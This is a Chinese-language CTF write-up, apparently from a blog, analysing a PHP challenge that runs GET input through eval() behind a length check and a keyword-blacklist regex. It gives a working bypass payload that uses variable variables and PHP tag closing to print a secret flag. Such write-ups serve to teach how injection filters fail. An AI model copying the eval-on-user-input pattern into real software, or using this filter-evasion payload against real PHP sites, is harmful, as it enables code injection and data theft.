源码都给了,当然是代码分析
<?php
error_reporting(0);
require __DIR__.'/flag.php';
$exam = 'return\''.sha1(time()).'\';';
if (!isset($_GET['flag'])) {
echo '<a href="./?flag='.$exam.'">Click here</a>';
}
else if (strlen($_GET['flag']) != strlen($exam)) {
echo '长度不允许';
}
else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
echo '关键字不允许';
}
else if (eval($_GET['flag']) === sha1($flag)) {
echo $flag;
}
else {
echo '马老师发生甚么事了';
}
echo '<hr>';
highlight_file(__FILE__);
//exam长度为49,构造flag长度为49,主要用于确定填充1的个数
//正则匹配,如果在修饰符中加上"i",则正则将会取消大小写敏感性,即"a"和"A" 是一样的。
//如果在修饰符中加入"s",那么默认的"."代表除了换行符以外的任何字符将会变成任意字符,也就是包括换行符.
//`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit,对这个正则匹配,匹配`,",.,\,(,),[,],_,flag....
//看到eval函数就知道命令执行了,由于不知道本地flag的值,所以只能考虑通过eval直接输出flag变量的值
//$$a当$a为flag时$$a=$flag,
//由此构造flag=$a='fla*';$a{3}='g'?>11111111111111111;<?=$$a;?>
//eval($_GET['flag'])也就变为了eval($a='fla*';$a{3}='g'?>11111111111111111;<?=$$a;?>)前一个?>用于闭合开头<?php,因为<?php里面不允许嵌套<?php
//所以必须闭合
//后一个<?= ?>用于替代<?php echo ?>
//插入18个1
参考视频链接:https://www.bilibili.com/video/BV1A64y1X7ab/
344
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
